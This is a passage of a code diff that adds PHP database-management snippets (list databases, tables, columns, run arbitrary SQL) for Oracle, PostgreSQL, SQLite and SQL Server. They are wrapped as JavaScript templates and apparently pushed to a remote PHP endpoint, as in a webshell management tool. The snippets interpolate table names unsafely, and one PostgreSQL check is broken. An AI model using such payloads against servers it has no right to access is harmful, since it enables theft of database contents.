+      while($rs=@mysqli_fetch_row($q)){
+        for($c=0;$c<$i;$c++){
+          echo(base64_encode(trim($rs[$c])));
+          echo("\\t|\\t");
+        }
+        echo("\\r\\n");
+      }
+    }
+    @mysqli_close($T);`.replace(/\n\s+/g, ''),
+  }
+})
\ No newline at end of file

source/core/phpraw/template/database/oracle.js

+/**
+ * 数据库管理模板::oracle
+ * i 数据分隔符号 => \\t|\\t
+ */
+
+module.exports = (arg1, arg2, arg3, arg4, arg5, arg6) => ({
+  // 显示所有数据库
+  show_databases: {
+    _: `
+    $sid=base64_decode("#{base64::host}");
+    $usr=base64_decode("#{base64::user}");
+    $pwd=base64_decode("#{base64::passwd}");
+    $H=@Ora_Logon("\${usr}/\${pwd}@\${sid}","");
+    if(!$H){
+      echo("ERROR:// Login Failed!");
+    }else{
+      $T=@ora_open($H);
+      @ora_commitoff($H);
+      $q=@ora_parse($T,"SELECT USERNAME FROM ALL_USERS ORDER BY 1");
+      if(ora_exec($T)){
+        while(ora_fetch($T)){
+          echo(trim(ora_getcolumn($T,0)).chr(9));
+        }
+      }
+      @ora_close($T);
+    };`.replace(/\n\s+/g, ''),
+    [arg1]: '#{host}',
+    [arg2]: '#{user}',
+    [arg3]: '#{passwd}'
+  },
+  // 显示数据库所有表
+  show_tables: {
+    _: `
+    $sid=base64_decode("#{base64::host}");
+    $usr=base64_decode("#{base64::user}");
+    $pwd=base64_decode("#{base64::passwd}");
+    $dbn=base64_decode("#{base64::db}");
+    $H=@ora_plogon("{$usr}@{$sid}","{$pwd}");
+    if(!$H){
+      echo("ERROR:// Login Failed!");
+    }else{
+      $T=@ora_open($H);
+      @ora_commitoff($H);
+      $q=@ora_parse($T,"SELECT TABLE_NAME FROM (SELECT TABLE_NAME FROM ALL_TABLES WHERE OWNER='{$dbn}' ORDER BY 1)");
+      if(ora_exec($T)){
+        while(ora_fetch($T)){
+          echo(trim(ora_getcolumn($T,0)).chr(9));
+        }
+      }
+      @ora_close($T);
+    };`.replace(/\n\s+/g, ''),
+  },
+  // 显示表字段
+  show_columns: {
+    _: `
+    $sid=base64_decode("#{base64::host}");
+    $usr=base64_decode("#{base64::user}");
+    $pwd=base64_decode("#{base64::passwd}");
+    $tab=base64_decode("#{base64::table}");
+    $H=@ora_plogon("{$usr}@{$sid}","{$pwd}");
+    if(!$H){
+      echo("ERROR:// Login Failed!");
+    }else{
+      $T=@ora_open($H);
+      @ora_commitoff($H);
+      $q=@ora_parse($T,"SELECT COLUMN_NAME,DATA_TYPE FROM ALL_TAB_COLUMNS WHERE TABLE_NAME='{$tab}' ORDER BY COLUMN_ID");
+      if(ora_exec($T)){
+        while(ora_fetch($T)){
+          echo(trim(ora_getcolumn($T,0))." (".ora_getcolumn($T,1).")".chr(9));
+        }
+      }
+      @ora_close($T);
+    };`.replace(/\n\s+/g, ''),
+  },
+  // 执行SQL语句
+  query: {
+    _: `
+    $sid=base64_decode("#{base64::host}");
+    $usr=base64_decode("#{base64::user}");
+    $pwd=base64_decode("#{base64::passwd}");
+    $dbn=base64_decode("#{base64::db}");
+    $sql=base64_decode("#{base64::sql}");
+    $H=@ora_plogon("{$usr}@{$sid}","{$pwd}");
+    if(!$H){
+      echo("ERROR:// Login Failed!");
+    }else{
+      $T=@ora_open($H);
+      @ora_commitoff($H);
+      $q=@ora_parse($T,"{$sql}");
+      $R=ora_exec($T);
+      if($R){
+        $n=ora_numcols($T);
+        for($i=0;$i<$n;$i++){
+          echo(Ora_ColumnName($T,$i)."\\t|\\t");
+        }
+        echo("\\r\\n");
+        while(ora_fetch($T)){
+          for($i=0;$i<$n;$i++){
+            echo(base64_encode(trim(ora_getcolumn($T,$i))));
+            echo("\\t|\\t");
+          }echo("\\r\\n");
+        }
+      }else{
+        echo("Status\\t|\\t\\r\\n".($q?"VHJ1ZQ==":"RmFsc2U=")."\\t|\\t\\r\\n");
+      }
+      @ora_close($T);
+    };`.replace(/\n\s+/g, ''),
+  }
+})
\ No newline at end of file

source/core/phpraw/template/database/oracle_oci8.js

+/**
+ * 数据库管理模板::oracle oci8 驱动
+ * i 数据分隔符号 => \\t|\\t
+ *
+ * session_mode: OCI_DEFAULT 0 OCI_SYSOPER 4 OCI_SYSDBA 2
+ *
+ */
+
+module.exports = (arg1, arg2, arg3, arg4, arg5, arg6) => ({
+  // 显示所有数据库
+  show_databases: {
+    _: `
+      $sid=base64_decode("#{base64::host}");
+      $usr=base64_decode("#{base64::user}");
+      $pwd=base64_decode("#{base64::passwd}");
+      $chs="utf8";
+      $mod=0;
+      $H=@oci_connect($usr,$pwd,$sid,$chs,$mod);
+      if(!$H){
+        echo("ERROR://".@oci_error()["message"]);
+      }else{
+        $q=@oci_parse($H,"SELECT USERNAME FROM ALL_USERS ORDER BY 1");
+        if(@oci_execute($q)){
+          while(@oci_fetch($q)){
+            echo(trim(@oci_result($q,1)).chr(9));
+          }
+        }else{
+          echo("Status\\t|\\t\\r\\n");
+          $e=@oci_error($q);
+          if($e){
+            echo(base64_encode("ERROR://{$e['message']} in [{$e['sqltext']}] col:{$e['offset']}")."\\t|\\t\\r\\n");
+          }else{
+            echo("RmFsc2U="."\\t|\\t\\r\\n");
+          }
+        }
+        @oci_close($H);
+      };`.replace(/\n\s+/g, ''),
+  },
+  // 显示数据库所有表
+  show_tables: {
+    _: `
+      $sid=base64_decode("#{base64::host}");
+      $usr=base64_decode("#{base64::user}");
+      $pwd=base64_decode("#{base64::passwd}");
+      $dbn=base64_decode("#{base64::db}");
+      $chs="utf8";
+      $mod=0;
+      $sql="SELECT TABLE_NAME FROM (SELECT TABLE_NAME FROM ALL_TABLES WHERE OWNER='{$dbn}' ORDER BY 1)";
+      $H=@oci_connect($usr,$pwd,$sid,$chs,$mod);
+      if(!$H){
+        echo("ERROR://".@oci_error()["message"]);
+      }else{
+        $q=@oci_parse($H,$sql);
+        if(@oci_execute($q)){
+          $n=@oci_fetch_all($q,$res,0,-1,OCI_FETCHSTATEMENT_BY_ROW+OCI_NUM);
+          if($n==0){
+            echo("ERROR://Database has no tables or no privilege");
+          }else{
+            for($i=0;$i<$n;$i++){
+              $row=$res[$i];
+              echo(trim($row[0]).chr(9));
+            }
+          }
+        }else{
+          echo("Status\\t|\\t\\r\\n");
+          $e=@oci_error($q);
+          if($e){
+            echo(base64_encode("ERROR://{$e['message']} in [{$e['sqltext']}] col:{$e['offset']}")."\\t|\\t\\r\\n");
+          }else{
+            echo("RmFsc2U="."\\t|\\t\\r\\n");
+          }
+        }
+        @oci_close($H);
+      };`.replace(/\n\s+/g, ''),
+  },
+  // 显示表字段
+  show_columns: {
+    _: `
+      $sid=base64_decode("#{base64::host}");
+      $usr=base64_decode("#{base64::user}");
+      $pwd=base64_decode("#{base64::passwd}");
+      $dbn=base64_decode("#{base64::db}");
+      $tab=base64_decode("#{base64::table}");
+      $sql="SELECT COLUMN_NAME,DATA_TYPE,DATA_LENGTH FROM ALL_TAB_COLUMNS WHERE OWNER='{$dbn}' AND TABLE_NAME='{$tab}' ORDER BY COLUMN_ID";
+      $chs="utf8";
+      $mod=0;
+      $H=@oci_connect($usr,$pwd,$sid,$chs,$mod);
+      if(!$H){
+        echo("ERROR://".@oci_error()["message"]);
+      }else{
+        $q=@oci_parse($H,$sql);
+        if(@oci_execute($q)){
+          $n=@oci_fetch_all($q,$res,0,-1,OCI_FETCHSTATEMENT_BY_ROW+OCI_NUM);
+          if($n==0){
+            echo("ERROR://Table has no columns or no privilege");
+          }else{
+            for($i=0;$i<$n;$i++){
+              $row=$res[$i];
+              echo(trim($row[0])." (".$row[1]."(".$row[2]."))".chr(9));
+            }
+          }
+        }else{
+          echo("Status\\t|\\t\\r\\n");
+          $e=@oci_error($q);
+          if($e){
+            echo(base64_encode("ERROR://{$e['message']} in [{$e['sqltext']}] col:{$e['offset']}")."\\t|\\t\\r\\n");
+          }else{
+            echo("RmFsc2U="."\\t|\\t\\r\\n");
+          }
+        }
+        @oci_close($H);
+      };`.replace(/\n\s+/g, ''),
+  },
+  // 执行SQL语句
+  query: {
+    _: `
+      $sid=base64_decode("#{base64::host}");
+      $usr=base64_decode("#{base64::user}");
+      $pwd=base64_decode("#{base64::passwd}");
+      $dbn=base64_decode("#{base64::db}");
+      $sql=base64_decode("#{base64::sql}");
+      $chs=base64_decode("#{base64::encode}");
+      $chs=$chs?$chs:"utf8";
+      $mod=0;
+      $H=@oci_connect($usr,$pwd,$sid,$chs,$mod);
+      if(!$H){
+        echo("ERROR://".@oci_error()["message"]);
+      }else{
+        $q=@oci_parse($H,$sql);
+        if(@oci_execute($q)) {
+          $n=oci_num_fields($q);
+          if($n==0){
+            echo("Affect Rows\\t|\\t\\r\\n".base64_encode(@oci_num_rows($q))."\\t|\\t\\r\\n");
+          }else{
+            for($i=1;$i<=$n;$i++){
+              echo(oci_field_name($q,$i)."\\t|\\t");
+            }
+            echo "\\r\\n";
+            while ($row = @oci_fetch_array($q, OCI_ASSOC+OCI_RETURN_NULLS)) {
+              foreach ($row as $item) {
+                echo($item !== null ? base64_encode($item):"")."\\t|\\t";
+              }
+              echo "\\r\\n";
+            }
+            @oci_free_statement($q);
+          }
+        }else{
+          echo("Status\\t|\\t\\r\\n");
+          $e=@oci_error($q);
+          if($e){
+            echo(base64_encode("ERROR://{$e['message']} in [{$e['sqltext']}] col:{$e['offset']}")."\\t|\\t\\r\\n");
+          }else{
+            echo("RmFsc2U="."\\t|\\t\\r\\n");
+          }
+        }
+        @oci_close($H);
+      }`.replace(/\n\s+/g, ''),
+  }
+})
\ No newline at end of file

source/core/phpraw/template/database/postgresql.js

+/**
+ * 数据库管理模板::postgresql
+ * i 数据分隔符号 => \\t|\\t
+ */
+
+module.exports = (arg1, arg2, arg3, arg4, arg5, arg6) => ({
+  // 显示所有数据库
+  show_databases: {
+    _: `
+      $hst=base64_decode("#{base64::host}");
+      $usr=base64_decode("#{base64::user}");
+      $pwd=base64_decode("#{base64::passwd}");
+      list($host,$port,$dbn) = explode(":", $hst);
+      $port == "" ? $port = "5432" : $port;
+      $dbn == "" ? $dbn = "postgres" : $dbn;
+      $arr=array(
+        'host'=>$host,
+        'port'=>$port,
+        'user'=>$usr,
+        'password'=>$pwd,
+        'dbname'=>$dbn
+      );
+      $cs='';
+      foreach($arr as $k=>$v) {
+        if(empty($v)){
+            continue;
+        }
+        $cs .= "$k=$v ";
+     }
+      $T=@pg_connect($cs);
+      if(!$T){
+        echo("ERROR://".@pg_last_error());
+      }else{
+        $q=@pg_query($T,"SELECT datname FROM pg_database where datistemplate='f';");
+        if(!$q){
+          echo("ERROR://".@pg_last_error());
+        }else{
+          while($rs=@pg_fetch_row($q)){
+            echo(trim($rs[0]).chr(9));
+          }
+          @pg_free_result($q);
+        }
+        @pg_close($T);
+      }`.replace(/\n\s+/g, ''),
+  },
+  // 显示数据库所有表
+  show_tables: {
+    _: `
+      $hst=base64_decode("#{base64::host}");
+      $usr=base64_decode("#{base64::user}");
+      $pwd=base64_decode("#{base64::passwd}");
+      $dbn=base64_decode("#{base64::db}");
+      list($host, $port) = explode(":", $hst);
+      $port == "" ? $port = "5432" : $port;
+      $arr=array(
+        'host'=>$host,
+        'port'=>$port,
+        'user'=>$usr,
+        'password'=>$pwd,
+        'dbname'=>$dbn,
+      );
+      $cs='';
+      foreach($arr as $k=>$v) {
+        if(empty($v)){
+            continue;
+        }
+        $cs .= "$k=$v ";
+     }
+      $T=@pg_connect($cs);
+      if(!$T){
+        echo("ERROR://".@pg_last_error());
+      }else{
+        $q=@pg_query($T,"SELECT table_name FROM information_schema.tables WHERE table_type='BASE TABLE' AND table_schema NOT IN ('pg_catalog', 'information_schema');");
+        if(!q){
+          echo("ERROR://".@pg_last_error());
+        }else{
+          while($rs=@pg_fetch_row($q)){
+            echo(trim($rs[0]).chr(9));
+          }
+          @pg_free_result($q);
+        }
+        @pg_close($T);
+      }`.replace(/\n\s+/g, ''),
+  },
+  // 显示表字段
+  show_columns: {
+    _: `
+      $hst=base64_decode("#{base64::host}");
+      $usr=base64_decode("#{base64::user}");
+      $pwd=base64_decode("#{base64::passwd}");
+      $dbn=base64_decode("#{base64::db}");
+      $tab=base64_decode("#{base64::table}");
+      list($host, $port) = explode(":", $hst);
+      $port == "" ? $port = "5432" : $port;
+      $arr=array(
+        'host'=>$host,
+        'port'=>$port,
+        'user'=>$usr,
+        'password'=>$pwd,
+        'dbname'=>$dbn,
+      );
+      $cs='';
+      foreach($arr as $k=>$v) {
+        if(empty($v)){
+            continue;
+        }
+        $cs .= "$k=$v ";
+     }
+      $T=@pg_connect($cs);
+      if(!$T){
+        echo("ERROR://".@pg_last_error());
+      }else{
+        $q=@pg_query($T,"SELECT column_name,udt_name,character_maximum_length FROM information_schema. COLUMNS WHERE TABLE_NAME = '{$tab}';");
+        if(!$q){
+          echo("ERROR://".@pg_last_error());
+        }else{
+          while($rs=@pg_fetch_row($q)){
+            $len=$rs[2]?$rs[2]:"0";
+            echo(trim($rs[0])." ({$rs[1]}({$len}))".chr(9));
+          }
+          @pg_free_result($q);
+        }
+        @pg_close($T);
+      }`.replace(/\n\s+/g, ''),
+  },
+  // 执行SQL语句
+  query: {
+    _: `
+      $hst=base64_decode("#{base64::host}");
+      $usr=base64_decode("#{base64::user}");
+      $pwd=base64_decode("#{base64::passwd}");
+      $dbn=base64_decode("#{base64::db}");
+      $sql=base64_decode("#{base64::sql}");
+      $encode=base64_decode("#{base64::encode}");
+      list($host, $port) = explode(":", $hst);
+      $port == "" ? $port = "5432" : $port;
+      $arr=array(
+        'host'=>$host,
+        'port'=>$port,
+        'user'=>$usr,
+        'password'=>$pwd,
+        'dbname'=>$dbn,
+      );
+      $cs='';
+      foreach($arr as $k=>$v) {
+        if(empty($v)){
+            continue;
+        }
+        $cs .= "$k=$v ";
+      }
+      $T=@pg_connect($cs);
+      if(!$T){
+        echo("ERROR://".@pg_last_error());
+      }else{
+        $q=@pg_query($T, $sql);
+        if(!$q){
+          echo("ERROR://".@pg_last_error());
+        }else{
+          $n=@pg_num_fields($q);
+          if($n===NULL){
+            echo("Status\\t|\\t\\r\\n");
+            echo(base64_encode("ERROR://".@pg_last_error())."\\t|\\t\\r\\n");
+          }elseif($n===0){
+            echo("Affect Rows\\t|\\t\\r\\n".base64_encode(@pg_affected_rows($q))."\\t|\\t\\r\\n");
+          }else{
+            for($i=0;$i<$n;$i++){
+              echo(@pg_field_name($q,$i)."\\t|\\t");
+            }
+            echo "\\r\\n";
+            while($row=@pg_fetch_row($q)){
+              for($i=0;$i<$n;$i++){
+                echo(base64_encode($row[$i]!==NULL?$row[$i]:"NULL")."\\t|\\t");
+              }
+              echo "\\r\\n";
+            }
+          }
+          @pg_free_result($q);
+        }
+        @pg_close($T);
+      }`.replace(/\n\s+/g, ''),
+  }
+})
\ No newline at end of file

source/core/phpraw/template/database/postgresql_pdo.js

+/**
+ * 数据库管理模板::postgresql_pdo
+ * i 数据分隔符号 => \\t|\\t
+ */
+
+module.exports = (arg1, arg2, arg3, arg4, arg5, arg6) => ({
+  // 显示所有数据库
+  show_databases: {
+    _: `
+      $hst=base64_decode("#{base64::host}");
+      $usr=base64_decode("#{base64::user}");
+      $pwd=base64_decode("#{base64::passwd}");
+      list($host, $port,$dbn) = explode(":", $hst);
+      $port == "" ? $port = "5432" : $port;
+      $dbn == "" ? $dbn = "postgres" : $dbn;
+      $arr=array(
+        'host'=>$host,
+        'port'=>$port,
+        'dbname'=>$dbn
+      );
+      $cs='pgsql:';
+      foreach($arr as $k=>$v) {
+        if(empty($v)){
+          continue;
+        }
+        $cs .= "$k=$v;";
+      }
+      $dbh=new PDO($cs,$usr,$pwd);
+      if(!$dbh){
+        echo("ERROR://CONNECT ERROR");
+      }else{
+        $query="select datname FROM pg_database where datistemplate='f';";
+        $result=$dbh->prepare($query);
+        $result->execute();
+        while($res=$result->fetch(PDO::FETCH_ASSOC)){
+          echo(trim($res['datname']).chr(9));
+        }
+        $dbh=null;
+      }`.replace(/\n\s+/g, ''),
+  },
+  // 显示数据库所有表
+  show_tables: {
+    _: `
+      $hst=base64_decode("#{base64::host}");
+      $usr=base64_decode("#{base64::user}");
+      $pwd=base64_decode("#{base64::passwd}");
+      $dbn=base64_decode("#{base64::db}");
+      list($host, $port) = explode(":", $hst);
+      $port == "" ? $port = "5432" : $port;
+      $arr=array(
+        'host'=>$host,
+        'port'=>$port,
+        'dbname'=>$dbn,
+      );
+      $cs='pgsql:';
+      foreach($arr as $k=>$v) {
+        if(empty($v)){
+          continue;
+        }
+        $cs .= "$k=$v;";
+      }
+      $dbh=new PDO($cs,$usr,$pwd);
+      if(!$dbh){
+        echo("ERROR://CONNECT ERROR");
+      }else{
+        $query="SELECT table_name FROM information_schema.tables WHERE table_type='BASE TABLE' AND table_schema NOT IN ('pg_catalog', 'information_schema');";
+        $result=$dbh->prepare($query);
+        $result->execute();
+        while($res=$result->fetch(PDO::FETCH_ASSOC)){
+          echo(trim($res['table_name']).chr(9));
+        }
+        $dbh=null;
+      }`.replace(/\n\s+/g, ''),
+  },
+  // 显示表字段
+  show_columns: {
+    _: `
+      $hst=base64_decode("#{base64::host}");
+      $usr=base64_decode("#{base64::user}");
+      $pwd=base64_decode("#{base64::passwd}");
+      $dbn=base64_decode("#{base64::db}");
+      $tab=base64_decode("#{base64::table}");
+      list($host, $port) = explode(":", $hst);
+      $port == "" ? $port = "5432" : $port;
+      $arr=array(
+        'host'=>$host,
+        'port'=>$port,
+        'dbname'=>$dbn,
+      );
+      $cs='pgsql:';
+      foreach($arr as $k=>$v) {
+        if(empty($v)){
+          continue;
+        }
+        $cs .= "$k=$v;";
+      }
+      $dbh=new PDO($cs,$usr,$pwd);
+      if(!$dbh){
+        echo("ERROR://CONNECT ERROR");
+      }else{
+        $query="SELECT column_name,udt_name,character_maximum_length FROM information_schema.COLUMNS WHERE TABLE_NAME = '{$tab}';";
+        $result=$dbh->prepare($query);
+        $result->execute();
+        while($res=$result->fetch(PDO::FETCH_ASSOC)){
+          $len=$res['character_maximum_length'] ? $res['character_maximum_length']:"0";
+          echo(trim($res['column_name'])." ({$res['udt_name']}({$len}))".chr(9));
+        }
+        $dbh = null;
+      }`.replace(/\n\s+/g, ''),
+  },
+  // 执行SQL语句
+  query: {
+    _: `
+      $hst=base64_decode("#{base64::host}");
+      $usr=base64_decode("#{base64::user}");
+      $pwd=base64_decode("#{base64::passwd}");
+      $dbn=base64_decode("#{base64::db}");
+      $sql=base64_decode("#{base64::sql}");
+      $encode=base64_decode("#{base64::encode}");
+      list($host, $port) = explode(":", $hst);
+      $port == "" ? $port = "5432" : $port;
+      $arr=array(
+        'host'=>$host,
+        'port'=>$port,
+        'dbname'=>$dbn,
+      );
+      $cs='pgsql:';
+      foreach($arr as $k=>$v) {
+        if(empty($v)){
+          continue;
+        }
+        $cs .= "$k=$v;";
+      }
+      $dbh=new PDO($cs,$usr,$pwd);
+      if(!$dbh){
+        echo("ERROR://CONNECT ERROR");
+      }else{
+        $result=$dbh->prepare($sql);
+        if(!$result->execute()){
+          echo("Status\\t|\\t\\r\\n");
+          $err="";
+          foreach(@$result->errorInfo() as $v){
+            $err.=$v." ";
+          }
+          echo(base64_encode("ERROR://".$err)."\\t|\\t\\r\\n");
+        }else{
+          $bool=True;
+          while($res=$result->fetch(PDO::FETCH_ASSOC)){
+            if($bool){
+              foreach($res as $key=>$value){
+                echo($key."\\t|\\t");
+              }
+              echo "\\r\\n";
+              $bool=False;
+            }
+            foreach($res as $key=>$value){
+              echo(base64_encode($value!==NULL?$value:"NULL")."\\t|\\t");
+            }
+            echo "\\r\\n";
+          }
+          if($bool){
+            if(!$result->columnCount()){
+              echo("Affect Rows\\t|\\t\\r\\n".base64_encode($result->rowCount())."\\t|\\t\\r\\n");
+            }else{
+              echo("Status\\t|\\t\\r\\n");
+              echo(base64_encode("ERROR://Table is empty.")."\\t|\\t\\r\\n");
+            }
+          }
+        }
+        $dbh = null;
+      }`.replace(/\n\s+/g, ''),
+  }
+})
\ No newline at end of file

source/core/phpraw/template/database/sqlite3.js

+/**
+ * 数据库管理模板:: sqlite3
+ * i 数据分隔符号 => \\t|\\t
+ */
+
+module.exports = (arg1, arg2, arg3, arg4, arg5, arg6) => ({
+  // 显示所有数据库
+  show_databases: {
+    _: `
+      $hst=base64_decode("#{base64::host}");
+      $dbh=new SQLite3($hst);
+      if(!$dbh){
+        echo("ERROR:// CONNECT ERROR".SQLite3::lastErrorMsg());
+      }else{
+        echo("main".chr(9));
+        $dbh->close();
+      }`.replace(/\n\s+/g, ''),
+  },
+  // 显示数据库所有表
+  show_tables: {
+    _: `
+      $hst=base64_decode("#{base64::host}");
+      $dbh=new SQLite3($hst);
+      if(!$dbh){
+        echo("ERROR:// CONNECT ERROR".SQLite3::lastErrorMsg());
+      }else{
+        $query="select tbl_name from sqlite_master where type='table' order by tbl_name;";
+        $stmt=$dbh->prepare($query);
+        $result=$stmt->execute();
+        while($res=$result->fetchArray(SQLITE3_ASSOC)){
+          echo(trim($res['tbl_name']).chr(9));
+        }
+        $dbh->close();
+      }`.replace(/\n\s+/g, ''),
+  },
+  // 显示表字段
+  show_columns: {
+    _: `
+      $hst=base64_decode("#{base64::host}");
+      $tab=base64_decode("#{base64::table}");
+      $dbh=new SQLite3($hst);
+      if(!$dbh){
+        echo("ERROR:// CONNECT ERROR".SQLite3::lastErrorMsg());
+      }else{
+        $query="pragma table_info('{$tab}');";
+        $stmt=$dbh->prepare($query);
+        $result=$stmt->execute();
+        while($res=$result->fetchArray(SQLITE3_ASSOC)){
+          echo(trim($res['name'])." ({$res['type']})".chr(9));
+        }
+        $dbh->close();
+      }`.replace(/\n\s+/g, ''),
+  },
+  // 执行SQL语句
+  query: {
+    _: `
+      $hst=base64_decode("#{base64::host}");
+      $sql=base64_decode("#{base64::sql}");
+      $encode=base64_decode("#{base64::encode}");
+      $dbh=new SQLite3($hst);
+      if(!$dbh){
+        echo("ERROR:// CONNECT ERROR".SQLite3::lastErrorMsg());
+      }else{
+        $stmt=$dbh->prepare($sql);
+        if(!$stmt){
+          echo("Status\\t|\\t\\r\\n");
+          echo(base64_encode("ERROR://".$dbh->lastErrorMsg())."\\t|\\t\\r\\n");
+        } else {
+          $result=$stmt->execute();
+          if(!$result){
+            echo("Status\\t|\\t\\r\\n");
+            echo(base64_encode("ERROR://".$dbh->lastErrorMsg())."\\t|\\t\\r\\n");
+          }else{
+            $bool=True;
+            while($res=$result->fetchArray(SQLITE3_ASSOC)){
+              if($bool){
+                foreach($res as $key=>$value){
+                  echo($key."\\t|\\t");
+                }
+                echo "\\r\\n";
+                $bool=False;
+              }
+              foreach($res as $key=>$value){
+                echo(base64_encode($value!==NULL?$value:"NULL")."\\t|\\t");
+              }
+              echo "\\r\\n";
+            }
+            if($bool){
+              if(!$result->numColumns()){
+                echo("Affect Rows\\t|\\t\\r\\n".base64_encode($dbh->changes())."\\t|\\t\\r\\n");
+              }else{
+                echo("Status\\t|\\t\\r\\n");
+                echo(base64_encode("ERROR:// Table is empty.")."\\t|\\t\\r\\n");
+              }
+            }
+          }
+        }
+        $dbh->close();
+      }`.replace(/\n\s+/g, ''),
+  }
+})
\ No newline at end of file

source/core/phpraw/template/database/sqlite_pdo.js

+/**
+ * 数据库管理模板:: sqlite3 pdo
+ * i 数据分隔符号 => \\t|\\t
+ */
+
+module.exports = (arg1, arg2, arg3, arg4, arg5, arg6) => ({
+  // 显示所有数据库
+  show_databases: {
+    _: `
+      $hst=base64_decode("#{base64::host}");
+      $cs='sqlite:'.$hst;
+      $dbh=new PDO($cs,'','');
+      if(!$dbh){
+        echo("ERROR:// CONNECT ERROR");
+      }else{
+        echo("main".chr(9));
+        $dbh=null;
+      }`.replace(/\n\s+/g, ''),
+  },
+  // 显示数据库所有表
+  show_tables: {
+    _: `
+      $hst=base64_decode("#{base64::host}");
+      $cs='sqlite:'.$hst;
+      $dbh=new PDO($cs,'','');
+      if(!$dbh){
+        echo("ERROR:// CONNECT ERROR");
+      }else{
+        $query="select tbl_name from sqlite_master where type='table' order by tbl_name;";
+        $result=$dbh->prepare($query);
+        $result->execute();
+        while($res=$result->fetch(PDO::FETCH_ASSOC)){
+          echo(trim($res['tbl_name']).chr(9));
+        }
+        $dbh=null;
+      }`.replace(/\n\s+/g, ''),
+  },
+  // 显示表字段
+  show_columns: {
+    _: `
+      $hst=base64_decode("#{base64::host}");
+      $dbn=base64_decode("#{base64::db}");
+      $tab=base64_decode("#{base64::table}");
+      $cs='sqlite:'.$hst;
+      $dbh=new PDO($cs,'','');
+      if(!$dbh){
+        echo("ERROR:// CONNECT ERROR");
+      }else{
+        $query="pragma table_info('{$tab}');";
+        $result=$dbh->prepare($query);
+        $result->execute();
+        while($res=$result->fetch(PDO::FETCH_ASSOC)){
+          echo(trim($res['name'])." ({$res['type']})".chr(9));
+        }
+        $dbh = null;
+      }`.replace(/\n\s+/g, ''),
+  },
+  // 执行SQL语句
+  query: {
+    _: `
+      $hst=base64_decode("#{base64::host}");
+      $dbn=base64_decode("#{base64::db}");
+      $sql=base64_decode("#{base64::sql}");
+      $encode=base64_decode("#{base64::encode}");
+      $cs='sqlite:'.$hst;
+      $dbh=new PDO($cs,'','');
+      if(!$dbh){
+        echo("ERROR:// CONNECT ERROR");
+      }else{
+        $result=$dbh->prepare($sql);
+        if(!$result->execute()){
+          echo("Status\\t|\\t\\r\\n");
+          $err="";
+          foreach(@$result->errorInfo() as $v){
+            $err.=$v." ";
+          }
+          echo(base64_encode("ERROR://".$err)."\\t|\\t\\r\\n");
+        }else{
+          $bool=True;
+          while($res=$result->fetch(PDO::FETCH_ASSOC)){
+            if($bool){
+              foreach($res as $key=>$value){
+                echo($key."\\t|\\t");
+              }
+              echo "\\r\\n";
+              $bool=False;
+            }
+            foreach($res as $key=>$value){
+              echo(base64_encode($value!==NULL?$value:"NULL")."\\t|\\t");
+            }
+            echo "\\r\\n";
+          }
+          if($bool){
+            if(!$result->columnCount()){
+              echo("Affect Rows\\t|\\t\\r\\n".base64_encode($result->rowCount())."\\t|\\t\\r\\n");
+            }else{
+              echo("Status\\t|\\t\\r\\n");
+              echo(base64_encode("ERROR://Table is empty.")."\\t|\\t\\r\\n");
+            }
+          }
+        }
+        $dbh = null;
+      }`.replace(/\n\s+/g, ''),
+  }
+})
\ No newline at end of file

source/core/phpraw/template/database/sqlsrv.js

+/**
+ * 数据库管理模板::sqlsrv
+ * php >= 5.3 原生不支持 mssql, 可采用 sqlsrv 连接 sqlserver
+ * i 数据分隔符号 => \\t|\\t
+ */
+
+module.exports = (arg1, arg2, arg3, arg4, arg5, arg6) => ({
+  // 显示所有数据库
+  show_databases: {
+    _: `
+      $hst=base64_decode("#{base64::host}");
+      $usr=base64_decode("#{base64::user}");
+      $pwd=base64_decode("#{base64::passwd}");
+      $chs="utf-8";
+      $T=@sqlsrv_connect($hst,array("UID"=> $usr,"PWD"=>$pwd,"Database"=>"master","CharacterSet"=>$chs));
+      $q=@sqlsrv_query($T,"select [name] from master.dbo.sysdatabases order by 1",null);
+      while($rs=@sqlsrv_fetch_array($q,SQLSRV_FETCH_NUMERIC)){
+        echo(trim($rs[0]).chr(9));
+      }
+      @sqlsrv_free_stmt($q);
+      @sqlsrv_close($T);`.replace(/\n\s+/g, ''),
+  },
+  // 显示数据库所有表
+  show_tables: {
+    _: `
+      $hst=base64_decode("#{base64::host}");
+      $usr=base64_decode("#{base64::user}");
+      $pwd=base64_decode("#{base64::passwd}");
+      $dbn=base64_decode("#{base64::db}");
+      $chs="utf-8";
+      $T=@sqlsrv_connect($hst,array("UID"=> $usr,"PWD"=>$pwd,"Database"=>$dbn,"CharacterSet"=>$chs));
+      $q=@sqlsrv_query($T,"SELECT [name] FROM sysobjects WHERE xtype='U' ORDER BY 1",null);
+      while($rs=@sqlsrv_fetch_array($q,SQLSRV_FETCH_NUMERIC)){
+        echo(trim($rs[0]).chr(9));
+      }
+      @sqlsrv_free_stmt($q);
+      @sqlsrv_close($T);`.replace(/\n\s+/g, ''),
+  },
+  // 显示表字段
+  show_columns: {
+    _: `
+      $hst=base64_decode("#{base64::host}");
+      $usr=base64_decode("#{base64::user}");
+      $pwd=base64_decode("#{base64::passwd}");
+      $dbn=base64_decode("#{base64::db}");
+      $tab=base64_decode("#{base64::table}");
+      $chs='utf-8';
+      $T=@sqlsrv_connect($hst,array("UID"=> $usr,"PWD"=>$pwd,"Database"=>$dbn,"CharacterSet"=>$chs));
+      $q=@sqlsrv_query($T,"select b.name,c.name,c.length from sysobjects a,syscolumns b,systypes c where a.id=b.id and b.xtype=c.xtype and a.name='{$tab}'",null);
+      while($rs=@sqlsrv_fetch_array($q,SQLSRV_FETCH_NUMERIC)){
+        echo(trim($rs[0])." ({$rs[1]}({$rs[2]}))".chr(9));
+      }
+      @sqlsrv_free_stmt($q);
+      @sqlsrv_close($T);`.replace(/\n\s+/g, ''),
+  },
+  // 执行SQL语句
+  query: {
+    _: `
+      $hst=base64_decode("#{base64::host}");
+      $usr=base64_decode("#{base64::user}");
+      $pwd=base64_decode("#{base64::passwd}");
+      $dbn=base64_decode("#{base64::db}");
+      $sql=base64_decode("#{base64::sql}");
+      $chs=base64_decode("#{base64::encode}");
+      $chs=($chs=='utf-8'||$chs=='char')?$chs:'utf-8';
+      $T=@sqlsrv_connect($hst,array("UID"=> $usr,"PWD"=>$pwd,"Database"=>$dbn,"CharacterSet"=>$chs));
+      $q=@sqlsrv_query($T,$sql,null);
+      if($q!==false){
+        $i=0;
+        $fm=@sqlsrv_field_metadata($q);
+        if(empty($fm)){
+          $ar=@sqlsrv_rows_affected($q);
+          echo("Affect Rows\\t|\\t\\r\\n".base64_encode($ar)."\\t|\\t\\r\\n");
+        }else{
